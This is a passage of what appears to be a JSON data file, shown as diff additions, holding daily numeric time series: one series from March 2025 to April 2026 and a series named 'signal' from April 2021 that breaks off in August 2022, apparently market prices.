], + [ + "2025-03-12", + 30.263498306274414 + ], + [ + "2025-03-13", + 28.60997200012207 + ], + [ + "2025-03-14", + 30.639751434326172 + ], + [ + "2025-03-17", + 31.23383331298828 + ], + [ + "2025-03-18", + 29.659515380859375 + ], + [ + "2025-03-19", + 30.813026428222656 + ], + [ + "2025-03-20", + 30.49618148803711 + ], + [ + "2025-03-21", + 30.78331756591797 + ], + [ + "2025-03-24", + 32.73884201049805 + ], + [ + "2025-03-25", + 33.32301330566406 + ], + [ + "2025-03-26", + 31.469974517822266 + ], + [ + "2025-03-27", + 30.93372344970703 + ], + [ + "2025-03-28", + 28.4709415435791 + ], + [ + "2025-03-31", + 28.451080322265625 + ], + [ + "2025-04-01", + 29.10649871826172 + ], + [ + "2025-04-02", + 29.7569522857666 + ], + [ + "2025-04-03", + 24.97538185119629 + ], + [ + "2025-04-04", + 20.402355194091797 + ], + [ + "2025-04-07", + 20.481801986694336 + ], + [ + "2025-04-08", + 19.314958572387695 + ], + [ + "2025-04-09", + 26.122364044189453 + ], + [ + "2025-04-10", + 22.90982437133789 + ], + [ + "2025-04-11", + 24.121355056762695 + ], + [ + "2025-04-14", + 24.627811431884766 + ], + [ + "2025-04-15", + 24.722152709960938 + ], + [ + "2025-04-16", + 22.487773895263672 + ], + [ + "2025-04-17", + 22.42322540283203 + ], + [ + "2025-04-21", + 20.784683227539062 + ], + [ + "2025-04-22", + 22.373571395874023 + ], + [ + "2025-04-23", + 23.858192443847656 + ], + [ + "2025-04-24", + 25.888996124267578 + ], + [ + "2025-04-25", + 26.743022918701172 + ], + [ + "2025-04-28", + 26.723159790039062 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.24948501586914 + ], + [ + "2025-05-01", + 28.18791961669922 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.173025131225586 + ], + [ + "2025-05-07", + 28.500736236572266 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890594482422 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.90793228149414 + ], + [ + "2025-05-23", + 32.92976760864258 + ], + [ + "2025-05-27", + 35.223731994628906 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.940711975097656 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.3856086730957 + ], + [ + "2025-06-04", + 36.678558349609375 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.847373962402344 + ], + [ + "2025-06-09", + 37.01123046875 + ], + [ + "2025-06-10", + 37.726234436035156 + ], + [ + "2025-06-11", + 37.33893585205078 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685989379883 + ], + [ + "2025-06-17", + 36.52463150024414 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.090675354003906 + ], + [ + "2025-06-24", + 38.77886962890625 + ], + [ + "2025-06-25", + 39.07662582397461 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276615142822266 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.34215545654297 + ], + [ + "2025-07-09", + 42.198577880859375 + ], + [ + "2025-07-10", + 42.00438690185547 + ], + [ + "2025-07-11", + 41.68572235107422 + ], + [ + "2025-07-14", + 42.128868103027344 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.343788146972656 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.85166549682617 + ], + [ + "2025-07-22", + 43.169517517089844 + ], + [ + "2025-07-23", + 43.73714065551758 + ], + [ + "2025-07-24", + 44.02593231201172 + ], + [ + "2025-07-25", + 44.27489471435547 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.503936767578125 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.92137145996094 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.54793167114258 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23505783081055 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.2325325012207 + ], + [ + "2025-08-14", + 47.10306930541992 + ], + [ + "2025-08-15", + 46.43586349487305 + ], + [ + "2025-08-18", + 46.3761100769043 + ], + [ + "2025-08-19", + 44.48401641845703 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.00185775756836 + ], + [ + "2025-08-25", + 44.608497619628906 + ], + [ + "2025-08-26", + 45.12633514404297 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702438354492 + ], + [ + "2025-08-29", + 44.493980407714844 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.56947708129883 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.37112808227539 + ], + [ + "2025-09-09", + 46.74955368041992 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.17858123779297 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.96030807495117 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.14200210571289 + ], + [ + "2025-09-23", + 51.091400146484375 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.261627197265625 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.18187713623047 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.485904693603516 + ], + [ + "2025-10-08", + 54.265167236328125 + ], + [ + "2025-10-09", + 54.05085754394531 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.40261459350586 + ], + [ + "2025-10-15", + 51.434288024902344 + ], + [ + "2025-10-16", + 50.861141204833984 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.71194839477539 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.102474212646484 + ], + [ + "2025-10-27", + 58.02804946899414 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.361637115478516 + ], + [ + "2025-11-05", + 56.43817138671875 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.861141204833984 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30082702636719 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596221923828 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.198604583740234 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87642288208008 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.331729888916016 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080383300781 + ], + [ + "2025-12-09", + 55.83012771606445 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037155151367 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.833335876464844 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2021-04-26", + 331.5281066894531 + ], + [ + "2021-04-27", + 330.0918273925781 + ], + [ + "2021-04-28", + 328.9758605957031 + ], + [ + "2021-04-29", + 330.1597595214844 + ], + [ + "2021-04-30", + 327.9957580566406 + ], + [ + "2021-05-03", + 326.2488708496094 + ], + [ + "2021-05-04", + 320.3777770996094 + ], + [ + "2021-05-05", + 319.30059814453125 + ], + [ + "2021-05-06", + 321.70733642578125 + ], + [ + "2021-05-07", + 324.3177185058594 + ], + [ + "2021-05-10", + 316.1273498535156 + ], + [ + "2021-05-11", + 315.6906433105469 + ], + [ + "2021-05-12", + 307.51953125 + ], + [ + "2021-05-13", + 309.8971252441406 + ], + [ + "2021-05-14", + 316.7386474609375 + ], + [ + "2021-05-17", + 314.81719970703125 + ], + [ + "2021-05-18", + 312.6919860839844 + ], + [ + "2021-05-19", + 313.0510559082031 + ], + [ + "2021-05-20", + 319.1065368652344 + ], + [ + "2021-05-21", + 317.3403625488281 + ], + [ + "2021-05-24", + 322.67767333984375 + ], + [ + "2021-05-25", + 323.12408447265625 + ], + [ + "2021-05-26", + 324.2498474121094 + ], + [ + "2021-05-27", + 323.03680419921875 + ], + [ + "2021-05-28", + 324.0557556152344 + ], + [ + "2021-06-01", + 322.9786071777344 + ], + [ + "2021-06-02", + 323.6092834472656 + ], + [ + "2021-06-03", + 320.2419738769531 + ], + [ + "2021-06-04", + 325.6763610839844 + ], + [ + "2021-06-07", + 326.6468505859375 + ], + [ + "2021-06-08", + 326.80206298828125 + ], + [ + "2021-06-09", + 326.8796691894531 + ], + [ + "2021-06-10", + 330.285888671875 + ], + [ + "2021-06-11", + 331.14959716796875 + ], + [ + "2021-06-14", + 334.3229064941406 + ], + [ + "2021-06-15", + 332.1394348144531 + ], + [ + "2021-06-16", + 330.9263916015625 + ], + [ + "2021-06-17", + 335.1282958984375 + ], + [ + "2021-06-18", + 332.4984436035156 + ], + [ + "2021-06-21", + 334.56500244140625 + ], + [ + "2021-06-22", + 337.68359375 + ], + [ + "2021-06-23", + 337.8487854003906 + ], + [ + "2021-06-24", + 339.93768310546875 + ], + [ + "2021-06-25", + 339.51983642578125 + ], + [ + "2021-06-28", + 343.6490478515625 + ], + [ + "2021-06-29", + 344.8926086425781 + ], + [ + "2021-06-30", + 344.3485107421875 + ], + [ + "2021-07-01", + 344.4845275878906 + ], + [ + "2021-07-02", + 348.4388122558594 + ], + [ + "2021-07-06", + 349.9447021484375 + ], + [ + "2021-07-07", + 350.68310546875 + ], + [ + "2021-07-08", + 348.5650634765625 + ], + [ + "2021-07-09", + 350.7413330078125 + ], + [ + "2021-07-12", + 352.1112365722656 + ], + [ + "2021-07-13", + 352.1112365722656 + ], + [ + "2021-07-14", + 352.7428283691406 + ], + [ + "2021-07-15", + 350.2652893066406 + ], + [ + "2021-07-16", + 347.4283447265625 + ], + [ + "2021-07-19", + 344.5817565917969 + ], + [ + "2021-07-20", + 348.58453369140625 + ], + [ + "2021-07-21", + 351.2757263183594 + ], + [ + "2021-07-22", + 353.5977783203125 + ], + [ + "2021-07-23", + 357.72686767578125 + ], + [ + "2021-07-26", + 358.00860595703125 + ], + [ + "2021-07-27", + 354.0641784667969 + ], + [ + "2021-07-28", + 355.4242248535156 + ], + [ + "2021-07-29", + 356.0558166503906 + ], + [ + "2021-07-30", + 354.20013427734375 + ], + [ + "2021-08-02", + 354.22918701171875 + ], + [ + "2021-08-03", + 356.3763122558594 + ], + [ + "2021-08-04", + 356.8912658691406 + ], + [ + "2021-08-05", + 359.1551208496094 + ], + [ + "2021-08-06", + 357.5811462402344 + ], + [ + "2021-08-09", + 358.2417907714844 + ], + [ + "2021-08-10", + 356.4054870605469 + ], + [ + "2021-08-11", + 355.7934265136719 + ], + [ + "2021-08-12", + 357.075927734375 + ], + [ + "2021-08-13", + 358.3292236328125 + ], + [ + "2021-08-16", + 358.4847106933594 + ], + [ + "2021-08-17", + 355.3270568847656 + ], + [ + "2021-08-18", + 351.9072570800781 + ], + [ + "2021-08-19", + 353.60748291015625 + ], + [ + "2021-08-20", + 357.27020263671875 + ], + [ + "2021-08-23", + 362.6138000488281 + ], + [ + "2021-08-24", + 363.7214050292969 + ], + [ + "2021-08-25", + 364.13909912109375 + ], + [ + "2021-08-26", + 361.8268737792969 + ], + [ + "2021-08-27", + 365.3438415527344 + ], + [ + "2021-08-30", + 369.4438171386719 + ], + [ + "2021-08-31", + 369.14263916015625 + ], + [ + "2021-09-01", + 369.754638671875 + ], + [ + "2021-09-02", + 369.579833984375 + ], + [ + "2021-09-03", + 370.7165832519531 + ], + [ + "2021-09-07", + 371.2412414550781 + ], + [ + "2021-09-08", + 369.94903564453125 + ], + [ + "2021-09-09", + 368.67633056640625 + ], + [ + "2021-09-10", + 365.878173828125 + ], + [ + "2021-09-13", + 365.6256103515625 + ], + [ + "2021-09-14", + 364.5860595703125 + ], + [ + "2021-09-15", + 367.29669189453125 + ], + [ + "2021-09-16", + 367.5492858886719 + ], + [ + "2021-09-17", + 363.1966857910156 + ], + [ + "2021-09-20", + 355.6919250488281 + ], + [ + "2021-09-21", + 356.12957763671875 + ], + [ + "2021-09-22", + 359.4560241699219 + ], + [ + "2021-09-23", + 362.7726135253906 + ], + [ + "2021-09-24", + 363.1130676269531 + ], + [ + "2021-09-27", + 360.2146301269531 + ], + [ + "2021-09-28", + 350.02142333984375 + ], + [ + "2021-09-29", + 349.44757080078125 + ], + [ + "2021-09-30", + 348.1636657714844 + ], + [ + "2021-10-01", + 350.32293701171875 + ], + [ + "2021-10-04", + 342.9698791503906 + ], + [ + "2021-10-05", + 347.5995788574219 + ], + [ + "2021-10-06", + 349.82696533203125 + ], + [ + "2021-10-07", + 353.03662109375 + ], + [ + "2021-10-08", + 351.2761535644531 + ], + [ + "2021-10-11", + 348.5819091796875 + ], + [ + "2021-10-12", + 347.3661804199219 + ], + [ + "2021-10-13", + 350.1478576660156 + ], + [ + "2021-10-14", + 356.5964050292969 + ], + [ + "2021-10-15", + 358.8432312011719 + ], + [ + "2021-10-18", + 362.4516906738281 + ], + [ + "2021-10-19", + 365.19451904296875 + ], + [ + "2021-10-20", + 364.7179260253906 + ], + [ + "2021-10-21", + 366.9452819824219 + ], + [ + "2021-10-22", + 363.862060546875 + ], + [ + "2021-10-25", + 367.587158203125 + ], + [ + "2021-10-26", + 368.7445983886719 + ], + [ + "2021-10-27", + 369.60052490234375 + ], + [ + "2021-10-28", + 373.7050476074219 + ], + [ + "2021-10-29", + 375.5433349609375 + ], + [ + "2021-11-01", + 376.8271789550781 + ], + [ + "2021-11-02", + 378.4028625488281 + ], + [ + "2021-11-03", + 382.4198303222656 + ], + [ + "2021-11-04", + 387.32183837890625 + ], + [ + "2021-11-05", + 387.6914978027344 + ], + [ + "2021-11-08", + 387.166259765625 + ], + [ + "2021-11-09", + 384.5013122558594 + ], + [ + "2021-11-10", + 378.8503112792969 + ], + [ + "2021-11-11", + 379.9007263183594 + ], + [ + "2021-11-12", + 383.898193359375 + ], + [ + "2021-11-15", + 383.8106994628906 + ], + [ + "2021-11-16", + 386.54376220703125 + ], + [ + "2021-11-17", + 386.7480163574219 + ], + [ + "2021-11-18", + 390.7552795410156 + ], + [ + "2021-11-19", + 392.9339904785156 + ], + [ + "2021-11-22", + 388.37237548828125 + ], + [ + "2021-11-23", + 386.6021728515625 + ], + [ + "2021-11-24", + 387.8471374511719 + ], + [ + "2021-11-26", + 380.4940490722656 + ], + [ + "2021-11-29", + 388.7516784667969 + ], + [ + "2021-11-30", + 383.04229736328125 + ], + [ + "2021-12-01", + 376.52569580078125 + ], + [ + "2021-12-02", + 379.2392883300781 + ], + [ + "2021-12-03", + 372.6448669433594 + ], + [ + "2021-12-06", + 375.6308898925781 + ], + [ + "2021-12-07", + 386.94256591796875 + ], + [ + "2021-12-08", + 388.6737976074219 + ], + [ + "2021-12-09", + 382.95477294921875 + ], + [ + "2021-12-10", + 387.1176452636719 + ], + [ + "2021-12-13", + 381.52508544921875 + ], + [ + "2021-12-14", + 377.576171875 + ], + [ + "2021-12-15", + 386.18389892578125 + ], + [ + "2021-12-16", + 376.2533874511719 + ], + [ + "2021-12-17", + 374.3761291503906 + ], + [ + "2021-12-20", + 370.74462890625 + ], + [ + "2021-12-21", + 379.04205322265625 + ], + [ + "2021-12-22", + 383.65814208984375 + ], + [ + "2021-12-23", + 386.550537109375 + ], + [ + "2021-12-27", + 392.9391784667969 + ], + [ + "2021-12-28", + 391.1179504394531 + ], + [ + "2021-12-29", + 391.0595703125 + ], + [ + "2021-12-30", + 389.89093017578125 + ], + [ + "2021-12-31", + 387.45623779296875 + ], + [ + "2022-01-03", + 391.18621826171875 + ], + [ + "2022-01-04", + 386.1123352050781 + ], + [ + "2022-01-05", + 374.25054931640625 + ], + [ + "2022-01-06", + 373.987548828125 + ], + [ + "2022-01-07", + 369.936279296875 + ], + [ + "2022-01-10", + 370.1797180175781 + ], + [ + "2022-01-11", + 375.7405700683594 + ], + [ + "2022-01-12", + 377.2305603027344 + ], + [ + "2022-01-13", + 367.7937316894531 + ], + [ + "2022-01-14", + 370.0823974609375 + ], + [ + "2022-01-18", + 360.8694763183594 + ], + [ + "2022-01-19", + 356.90582275390625 + ], + [ + "2022-01-20", + 352.2701110839844 + ], + [ + "2022-01-21", + 342.5021667480469 + ], + [ + "2022-01-24", + 344.07012939453125 + ], + [ + "2022-01-25", + 336.09405517578125 + ], + [ + "2022-01-26", + 335.5682373046875 + ], + [ + "2022-01-27", + 332.1888122558594 + ], + [ + "2022-01-28", + 342.6092834472656 + ], + [ + "2022-01-31", + 353.56536865234375 + ], + [ + "2022-02-01", + 355.97088623046875 + ], + [ + "2022-02-02", + 358.8632507324219 + ], + [ + "2022-02-03", + 344.31353759765625 + ], + [ + "2022-02-04", + 348.6571044921875 + ], + [ + "2022-02-07", + 345.8522644042969 + ], + [ + "2022-02-08", + 349.7381286621094 + ], + [ + "2022-02-09", + 357.1492614746094 + ], + [ + "2022-02-10", + 349.0660705566406 + ], + [ + "2022-02-11", + 337.9931640625 + ], + [ + "2022-02-14", + 338.41192626953125 + ], + [ + "2022-02-15", + 346.8262023925781 + ], + [ + "2022-02-16", + 346.73858642578125 + ], + [ + "2022-02-17", + 336.4252014160156 + ], + [ + "2022-02-18", + 332.5881652832031 + ], + [ + "2022-02-22", + 329.24774169921875 + ], + [ + "2022-02-23", + 320.8139953613281 + ], + [ + "2022-02-24", + 331.5947265625 + ], + [ + "2022-02-25", + 336.7368469238281 + ], + [ + "2022-02-28", + 337.7398681640625 + ], + [ + "2022-03-01", + 332.5686340332031 + ], + [ + "2022-03-02", + 338.14898681640625 + ], + [ + "2022-03-03", + 333.31854248046875 + ], + [ + "2022-03-04", + 328.4880676269531 + ], + [ + "2022-03-07", + 316.3730773925781 + ], + [ + "2022-03-08", + 314.902587890625 + ], + [ + "2022-03-09", + 326.23846435546875 + ], + [ + "2022-03-10", + 322.6156311035156 + ], + [ + "2022-03-11", + 315.92510986328125 + ], + [ + "2022-03-14", + 309.85791015625 + ], + [ + "2022-03-15", + 319.5771484375 + ], + [ + "2022-03-16", + 331.42919921875 + ], + [ + "2022-03-17", + 335.4415588378906 + ], + [ + "2022-03-18", + 342.3074035644531 + ], + [ + "2022-03-21", + 341.3556823730469 + ], + [ + "2022-03-22", + 348.0643005371094 + ], + [ + "2022-03-23", + 343.0621337890625 + ], + [ + "2022-03-24", + 350.68731689453125 + ], + [ + "2022-03-25", + 350.3947448730469 + ], + [ + "2022-03-28", + 355.8161926269531 + ], + [ + "2022-03-29", + 361.9396667480469 + ], + [ + "2022-03-30", + 357.9418029785156 + ], + [ + "2022-03-31", + 353.5052490234375 + ], + [ + "2022-04-01", + 352.83245849609375 + ], + [ + "2022-04-04", + 360.0968017578125 + ], + [ + "2022-04-05", + 352.10113525390625 + ], + [ + "2022-04-06", + 344.45654296875 + ], + [ + "2022-04-07", + 345.2756042480469 + ], + [ + "2022-04-08", + 340.4489440917969 + ], + [ + "2022-04-11", + 332.3947448730469 + ], + [ + "2022-04-12", + 330.99072265625 + ], + [ + "2022-04-13", + 337.7187194824219 + ], + [ + "2022-04-14", + 329.9960021972656 + ], + [ + "2022-04-18", + 330.2496032714844 + ], + [ + "2022-04-19", + 337.63092041015625 + ], + [ + "2022-04-20", + 332.7068176269531 + ], + [ + "2022-04-21", + 325.8227233886719 + ], + [ + "2022-04-22", + 317.2908020019531 + ], + [ + "2022-04-25", + 321.36663818359375 + ], + [ + "2022-04-26", + 309.2366027832031 + ], + [ + "2022-04-27", + 308.8661193847656 + ], + [ + "2022-04-28", + 319.8357238769531 + ], + [ + "2022-04-29", + 305.443603515625 + ], + [ + "2022-05-02", + 310.543212890625 + ], + [ + "2022-05-03", + 310.8747863769531 + ], + [ + "2022-05-04", + 321.38616943359375 + ], + [ + "2022-05-05", + 305.1998291015625 + ], + [ + "2022-05-06", + 301.5432434082031 + ], + [ + "2022-05-09", + 289.7447814941406 + ], + [ + "2022-05-10", + 293.2648620605469 + ], + [ + "2022-05-11", + 284.5671691894531 + ], + [ + "2022-05-12", + 283.894287109375 + ], + [ + "2022-05-13", + 294.4153747558594 + ], + [ + "2022-05-16", + 291.00262451171875 + ], + [ + "2022-05-17", + 298.5400390625 + ], + [ + "2022-05-18", + 283.8846130371094 + ], + [ + "2022-05-19", + 282.3634338378906 + ], + [ + "2022-05-20", + 281.48583984375 + ], + [ + "2022-05-23", + 286.1662292480469 + ], + [ + "2022-05-24", + 280.0817565917969 + ], + [ + "2022-05-25", + 284.0015869140625 + ], + [ + "2022-05-26", + 291.8704528808594 + ], + [ + "2022-05-27", + 301.39703369140625 + ], + [ + "2022-05-31", + 300.5974426269531 + ], + [ + "2022-06-01", + 298.374267578125 + ], + [ + "2022-06-02", + 306.5454406738281 + ], + [ + "2022-06-03", + 298.56927490234375 + ], + [ + "2022-06-06", + 299.5638427734375 + ], + [ + "2022-06-07", + 302.1478271484375 + ], + [ + "2022-06-08", + 299.973388671875 + ], + [ + "2022-06-09", + 291.9387512207031 + ], + [ + "2022-06-10", + 281.641845703125 + ], + [ + "2022-06-13", + 268.54656982421875 + ], + [ + "2022-06-14", + 269.03411865234375 + ], + [ + "2022-06-15", + 275.75244140625 + ], + [ + "2022-06-16", + 264.62677001953125 + ], + [ + "2022-06-17", + 267.8445129394531 + ], + [ + "2022-06-21", + 274.60211181640625 + ], + [ + "2022-06-22", + 274.2015686035156 + ], + [ + "2022-06-23", + 278.2852478027344 + ], + [ + "2022-06-24", + 287.8202819824219 + ], + [ + "2022-06-27", + 285.7100524902344 + ], + [ + "2022-06-28", + 277.00543212890625 + ], + [ + "2022-06-29", + 277.2593994140625 + ], + [ + "2022-06-30", + 273.82061767578125 + ], + [ + "2022-07-01", + 275.6279296875 + ], + [ + "2022-07-05", + 280.3466796875 + ], + [ + "2022-07-06", + 282.1441955566406 + ], + [ + "2022-07-07", + 288.1817932128906 + ], + [ + "2022-07-08", + 288.54327392578125 + ], + [ + "2022-07-11", + 282.378662109375 + ], + [ + "2022-07-12", + 279.6431884765625 + ], + [ + "2022-07-13", + 279.0667419433594 + ], + [ + "2022-07-14", + 280.0632629394531 + ], + [ + "2022-07-15", + 285.1434326171875 + ], + [ + "2022-07-18", + 282.7303161621094 + ], + [ + "2022-07-19", + 291.4252624511719 + ], + [ + "2022-07-20", + 296.04620361328125 + ], + [ + "2022-07-21", + 300.29608154296875 + ], + [ + "2022-07-22", + 295.03021240234375 + ], + [ + "2022-07-25", + 293.349853515625 + ], + [ + "2022-07-26", + 287.5858154296875 + ], + [ + "2022-07-27", + 299.7391357421875 + ], + [ + "2022-07-28", + 302.6699523925781 + ], + [ + "2022-07-29", + 308.18975830078125 + ], + [ + "2022-08-01", + 308.0041198730469 + ], + [ + "2022-08-02", + 